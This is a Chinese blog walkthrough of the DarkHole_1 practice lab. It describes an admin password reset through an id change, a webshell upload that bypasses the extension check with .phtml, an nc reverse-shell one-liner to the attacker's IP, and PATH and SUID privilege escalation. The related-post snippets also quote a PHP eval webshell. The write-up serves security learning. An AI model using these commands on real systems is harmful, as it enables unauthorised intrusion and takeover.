DarkHole_1的拿flag思路

已于 2023-11-17 13:48:29 修改
阅读量91 收藏
点赞数
文章标签: web安全 安全 安全性测试
于 2023-11-16 21:26:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66583740/article/details/134451208
版权

DarkHole_1的拿flag思路
首先第一步是找到主页,
第二步是通过login的垂直越权切换到admin,
第三步通过admin里的文件上传拿到webshell,
第四步通过webshell进行本机提权!

1.第一步:找到目标主机

首先ifconfig找到本机ip
在这里插入图片描述
通过kali自带nmap扫描到目标主机ip

nmap -A 192.168.204.0/24

在这里插入图片描述
通过nmap扫描出来22和80端口,22端口可以尝试ssh爆破
先打开80端口看下网页

2.越权

在这里插入图片描述
在这里插入图片描述
靶机提示不用采取爆破,所以先注册一个账号
经过尝试可以通过修改id,对admin账户进行密码修改
在这里插入图片描述
使用burp修改id值,达到修改admin账户密码,登录后发现有上传点
在这里插入图片描述

在这里插入图片描述

3.文件上传

在这里插入图片描述
尝试了.htaccess,双写,大小写,有些可以上传但是无法执行,后来通过改后缀为.phtml,成功绕过并执行
在这里插入图片描述在这里插入图片描述
通过蚁剑连接用NC反弹shell
在这里插入图片描述
经测试不能用-e,采取别的方式
目标主机:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.204.131 7777 >/tmp/f

在这里插入图片描述

kali:

nc -lvvp 7777

在这里插入图片描述
反弹成功
在这里插入图片描述
升级成交互式shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述

第四步:提权

通过find命令查找具有suid权限的文件

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述
使用PATH 变量进行权限提升,拿到john权限

echo $PATH
echo "/bin/bash" >/tmp/id
chmod 777 /tmp/id
export PATH=/tmp:$PATH
echo $PATH
./toto
whoami

在这里插入图片描述
通过ls -l ,查看user拿到第一个flag,查看password拿到密码

在这里插入图片描述
通过sudo -l,看到提升root的提示
在这里插入图片描述
通过在file.py中添加命令获得root 权限

#file.py
import os;
os.system('chmod +s /bin/bash');

bash -p

在这里插入图片描述
到root目录下找到第二个flag
在这里插入图片描述

总结:

这个靶机主要是考察了三个点,越权,文件上传,PATH提权

blue_EDG
关注
AttributeError: module ‘lib‘ has no attribute ‘X509_V_FLAG_CB_ISSUER_CHECK‘解决方案
weixin_43178406的博客
12-11 5万+
本文主要介绍了AttributeError: module ‘lib’ has no attribute 'X509_V_FLAG_CB_ISSUER_CHECK’解决方案,希望能对使用python的同学们有所帮助。 文章目录 1. 问题描述 2. 解决方案
获取管理员权限后,如何利用得到flag
weixin_47346400的博客
09-14 3102
首先在rdctf部署一个地址 然后打开该界面并登录该网站的后门 mimawei:8618ahead (reverse) 在附件管理上传webshell.php文件并上传 然后打开该网站前台的文件
CTF学习-Vulnhub 靶场 之DARKHOLE
dengpan119的博客
03-30 3882
文章目录前期准备一、信息收集二、使用步骤1.引入库2.读入数据总结 前期准备 靶机地址:https://www.vulnhub.com/entry/darkhole-2,740/ kali攻击机ip:172.X.X.176 windows 10攻击机:172.X.X.189 靶机ip:172.X.X.188 一、信息收集 首先利用arp-scan -l 扫描到靶机IP: 然后使用nmap扫描靶机端口信息 发现靶机开放了22和80业务端口,还有一个敏感信息.git仓库文件,那就把仓库转过来看看,使用gi
DarkHole2靶机渗透笔记
qq_60600840的博客
08-12 152
DarkHole2靶机安全、渗透
rdctf-shizhan1借助注入木马找到flag
qq_45970858的博客
09-14 1608
rdctf-shizhan1 进入实战页面 复制链接打开新的页面,在后面输入admins/进入后台管理员页面 找到可以上传文件的地方,例如附件管理,上传文件 此时先需要把php开启 点击网站,打开根目录 点击新建,创建新的php文档 (一句话木马工作原理 <?php @eval($_POST['shell']);?> 这是php的一句话后门中最普遍的一种。它的工作原理是: 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然
web安全初阶2
m0_74146042的博客
05-28 406
Training-WWW-Robots nssctf(litctf,Litctf) 1.[LitCTF 2023]导弹迷踪 2.Follow me and hack me 3.作业管理系统 4.Flag点击就送 攻防世界 1.fileinclude 2.file_include 3.fileclude 4.inget 5.easyupload
VulnHub—DarkHole_ 2
2301_76786857的博客
06-19 111
靶机下载地址为:vulnhub-DARKHOLE: 2靶机IP:192.168.245.140测试机系统:kali、win10测试机IP:192.168.245.139。
攻防世界MISC新手区 give_you_flag
liver100day的博客
10-11 2083
攻防世界MISC新手区 give_you_flag 下载题目附件,是一个gif动图 题目提示我们文件中的彩蛋,看到了一瞥而过的二维码 我这里使用的是Stegsolve工具拿取二维码,打开文件,选择Frame Browser 功能 在50页,我们就发现了我们想要的二维码 保存下来查看,却发现二维码并不完整,缺少了部分东西 我们这里吧空余部分补上 然后使用二维码识图工具识别,使用手机扫描识别或许会扫不出来 成功扫描出flag flag{e7d478cf6b915f50ab1277f78502a2
【完美解决系列】Activity context requires the FLAG_ACTIVITY_NEW_TASK flag
OAOAAce的专栏
05-13 9960
在Service中启动Activity,会报错如下: Intent intent = new Intent(MyService.this, Main2Activity.class); startActivity(intent); ...
FLAG_ACTIVITY_CLEAR_TOP FLAG_ACTIVITY_SINGLE_TOP
天下无双
11-03 4034
假设三个Activity  A B C rugu
allow_unreachable flag
jacke121的专栏
06-24 3623
allow_unreachable flag 同学的博客的答案: https://blog.csdn.net/qxqsunshine/article/details/88118131 1......torch/autograd/__init__.py", line 90, in backward allow_unreachable=True) # allow_unreachable flag RuntimeError: one of the variables needed for g...
上传webshell,利用获取flag
weixin_50644630的博客
09-14 3200
一、上传webshell 1创建一个文件,并命名为webshell 文件代码如下 <?php @eval($_POST['shell']);?> 2登陆后台,上传文件wenshell.php 进入附件管理,上传文件 在前台找到文件 点击常用文件,找到自己上传的文件 找到文件的目录 二、利用获取flag中添加URL,并填入密码 进入查看文件内容,找到flag ...
ctfhub——技能树--文件上传
lulu001128的博客
02-28 748
文件上传解题过程
ctfshow web入门 代码审计
Sentiment的博客
02-12 2942
web301
2024年网络安全(黑客技术)三个月自学手册
csbDD的博客
11-06 1683
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全(黑客技术)2024年三个月自学手册
2401_85026116的博客
11-05 1171
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
硬件设备网络安全问题与潜在漏洞分析及渗透测试应用
最新发布
weixin_62512865的博客
11-08 1063
硬件加密绕过漏洞:研究发现,多款流行的SSD存在加密机制绕过漏洞,攻击者可以无需密码 即可绕过硬盘加密措施,获取硬盘中的数据内容。这包括Crucial和Samsung等品牌的SSD产 品,它们尝试实现TCG Opal加密标准,但存在缺陷,允许在不知道任何密钥的情况下完全恢 复数据。固件更新机制漏洞:英睿达MX500系列SSD被曝出存在缓冲区溢出漏洞,攻击者可以精心构 造ATA数据包,通过主机直接发送给SSD控制器,从而触发缓冲区溢出,可能导致数据泄露。
入门网络安全工程师要学习哪些内容(详细教程)
白帽子佳奇的博客
11-06 610
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
11-05 541
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
FlagStatus Key_0_Flag = RESET; FlagStatus Key_1_Flag = RESET; FlagStatus Key_2_Flag = RESET; FlagStatus Key_4_Flag = RESET; FlagStatus Key_5_Flag = RESET; FlagStatus Key_6_Flag = RESET; FlagStatus Key_7_Flag = RESET; FlagStatus Key_9_Flag = RESET; FlagStatus Key_up_Flag = RESET; FlagStatus Key_down_Flag = RESET; FlagStatus Key_left_Flag = RESET; FlagStatus Key_right_Flag = RESET; FlagStatus Key_F1_Flag = RESET; FlagStatus Key_F2_Flag = RESET; FlagStatus Key_return_Flag = RESET; FlagStatus Key_confirm_Flag = RESET; FlagStatus Key__Flag = RESET; //小数点 FlagStatus Key_backup_Flag = RESET; 什么意思
07-08
这些Flag变量可能用于表示按键的状态,其中包括Key_0_Flag、Key_1_Flag、Key_2_Flag、Key_4_Flag、Key_5_Flag、Key_6_Flag、Key_7_Flag、Key_9_Flag、Key_up_Flag、Key_down_Flag、Key_left_Flag、Key_right_Flag、...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值